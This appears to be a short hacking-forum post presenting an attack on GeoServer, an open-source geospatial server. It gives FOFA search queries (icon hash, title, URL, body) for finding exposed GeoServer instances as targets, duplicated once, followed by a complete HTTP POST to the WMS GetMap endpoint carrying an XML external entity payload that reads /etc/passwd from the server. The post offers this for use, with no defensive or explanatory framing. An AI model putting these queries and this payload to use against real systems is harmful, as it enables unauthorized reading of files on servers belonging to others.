GeoServer is an open source server designed for publishing, processing and editing geospatial data using open standards such as OGC WMS, WFS and WCS.
Use this FOFA query to search for targets:
icon_hash="-629047854"
title="GeoServer"
url="/geoserver/web"
body="GeoServer"
Use this query to read the file system.
Use this FOFA query to search for targets:
icon_hash="-629047854"
title="GeoServer"
url="/geoserver/web"
body="GeoServer"
Use this query to read the file system.
Код:
POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90 HTTP/1.1
Host: TARGET:8080
User-Agent: curl/8.16.0
Accept: */*
Content-Type: application/xml
Content-Length: 244
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>